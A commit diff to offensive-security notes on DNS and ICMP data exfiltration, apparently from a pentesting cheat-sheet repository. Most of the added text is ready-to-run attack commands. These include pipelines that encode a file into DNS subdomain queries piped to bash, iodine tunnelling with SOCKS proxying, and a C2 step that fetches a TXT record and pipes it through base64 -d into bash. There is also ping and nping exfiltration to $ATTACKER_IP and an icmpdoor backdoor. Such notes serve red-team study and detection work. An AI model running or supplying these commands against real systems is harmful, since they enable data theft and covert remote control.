bump

exfiltration/dns/dns.md

@@ -4,35 +4,16 @@
 * [Zones](https://www.cloudflare.com/learning/dns/glossary/dns-zone/)
 * [Records](https://www.cloudflare.com/learning/dns/dns-records/)
 
-## Tunneling
-* [Tunnel IPv4 Data through DNS](https://github.com/yarrick/iodine.git)
-* Start server on an outside DNS server. This may be a evs.
-```sh 
-iodined -b 47110-f 10.0.0.1 tunnel.test.com
-```
-* Use client via
-```sh
-iodine -f -r <server-IP> tunnel.test.com
-```
-* `NS` record of the owned domain should contain the subdomain, e.g. `tunnel.test.com`
-* Client gets a tunnel IP in the range of `10.0.0.0/8`
-* Check connection via 
-```sh
-ping <server-IP>
-```
-* Generate ssh-key and put in on the server
-* Dynamic port forwarding to server via
-```sh
-ssh <user>@10.0.0.1 -D 8080
-```
-* User proxy server on the client's web server like `--proxy-server` or use a SOCKS proxy like FoxyProxy
+## Queries
+
+### nslookup
 
-## nslookup
 ```sh
 nslookup type=txt <domain>
 ```
 
-## Reverse lookup
+### Reverse lookup
+
 * Stored inside `PTR` record
 * Reverse IP may look like `<IP>.in-addr.arpa.`, but not via `drill` or `dig`
 ```sh
@@ -40,10 +21,92 @@ drill -x +short <IP>
 ```
 
 ## Exfiltration
+
 * Add data to UDP DNS requests
 * Capture traffic on an owned DNS server
-* `253` is the max length of a DNS name
+* `253` is the max length of a DNS name, excluding dots
+* `63` is the mx length of subdomains
 * Encode the payload to hide it 
 
 ## Infiltration
+
 * Inside `TXT` or any other possible records
+
+## Usage
+
+### Manual Tunneling
+
+Preconditions are:
+    1. Domain with an `A` record
+    2. `NS` record to controlled DNS to resolve the domain query
+
+* Attach the encoded payload as the subdomain
+```sh
+base64 -w0 <payload.txt> | fold -w 24 | sed -r 's/.*/&.example.com/'
+```
+
+* Query the DNS server
+```sh
+base64 -w0 <payload.txt> | fold -w 24 | sed -r 's/.*/&.example.com/' | awk '{print "dig +short $1"}' | bash
+```
+
+* Optionally putting the payload in a single query via
+```sh
+base64 -w0 <payload.txt> | fold -w 24 | sed 's/.*/&./' | tr -d '\n' | sed 's/$/example.com/' | awk '{print "dig +short" $1}' | bash
+```
+
+* Decode received data on the controlled DNS server via
+```sh
+echo "DomainBase64encoded.example.com" | sed 's/\.example\.com//;s/\.//g' | base64 -d
+```
+
+### Tunneling via Iodine
+
+* [Tunnel IPv4 Data through DNS](https://github.com/yarrick/iodine.git)
+* Encapsulate protocols in side the DNS tunnel
+
+* Start server on an outside DNS server. This may be a evs.
+```sh 
+iodined -b <optionalListeningPort> -f 10.0.0.1</optionalCIDR> -c -P <optionalPassword> tunnel.test.com
+```
+
+* Use client via
+```sh
+iodine -f -r <optionalServer-IP> -P <optionlPassword>  tunnel.test.com
+```
+
+* `NS` record of the owned domain should contain the subdomain, e.g. `tunnel.test.com`
+* Client gets a tunnel IP in the range of `10.0.0.0/8`
+* Check connection via 
+```sh
+ping <server-IP>
+```
+
+* Generate ssh-key and put in on the server
+* Dynamic port forwarding to the network through the server as a proxy via ssh
+```sh
+ssh <user>@10.0.0.1 -4 -f -N -D <8080/1080>
+```
+
+* User proxy server on the client's web server like `--proxy-server` or use a SOCKS proxy like FoxyProxy, or proxychains
+```sh
+proxychains curl http://$TARGET_IP/
+curl --socks5 localhost:1080 http://$
+```
+    
+### C2 over DNS
+
+* Preconditions are the same as [Manual Tunneling](#Manual Tunneling)
+    * Plus: Data to control the appliances will be put into `TXT` record
+    * Data to control the appliances may be a shell script sending payloads via ICMP data field, DNS subdomains or execute something locally on the target
+
+* Encode the payload and add it as `TXT` record
+```sh
+base64 ./script.sh
+```
+
+* Query and execute on target
+```sh
+dig +short -t TXT script.example.com | sed 's/\"//g'| base64 -d | bash
+```
+

exfiltration/icmp.md

@@ -0,0 +1,64 @@
+# ICMP Exfiltration
+
+* [ICMP Types](https://www.iana.org/assignments/icmp-parameters/icmp-parameters.xhtm)
+
+* Type 0, which is Echo Reply contains an optional data field inside the header
+```
+ 0                   1                   2                   3  
+ 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
++-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+|      Type     |      Code     |            Checksum           |
++-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+|           Identifier          |        Sequence Number        |
++-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+|                                                               |
++                              Data                             +
+|                                                               |
++-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+```
+
+## Usage
+
+* The `Pattern` parameter can be used to pad the bytes. From the manual
+```
+ -p pattern
+           You may specify up to 16 “pad” bytes to fill out the packet you send. This is useful for diagnosing
+           data-dependent problems in a network. For example, -p ff will cause the sent packet to be filled with all ones.
+```
+
+* Pad hex values
+```sh
+ping $TARGET_IP -c 1 -p $(echo "data payload" | xxd -p )
+```
+
+### Metasploit ICMP Exfiltration
+
+* Awaiting ICMP data on Attacker
+```sh
+use auxiliary/server/icmp_exfil
+set BPF_FILTER icmp and not src $ATTACKER_IP
+set interface <interface>
+run
+```
+
+* Exfiltrating from target via `ping` shown above or use `nping`
+* Starting the transmission via `nping` and BOF
+```sh
+sudo nping --icmp -c 1 $ATTACKER_IP --data-string "BOFpayload.txt"
+sudo nping --icmp -c 1 $ATTACKER_IP --data-string "actual payload"
+sudo nping --icmp -c 1 $ATTACKER_IP --data-string "EOF"
+```
+
+### C2 over ICMP
+
+* Use [krabelize's ICMPdoor](https://github.com/krabelize/icmpdoor)
+
+* On target
+```sh
+sudo icmpdoor -i <interface> -d $ATTACKER_IP
+```
+
+* On attacker
+```sh
+sudo icmp-cnc -i <interface> -d $TARGET_IP
+```

exfiltration/links.txt

@@ -0,0 +1 @@
+https://lots-project.com/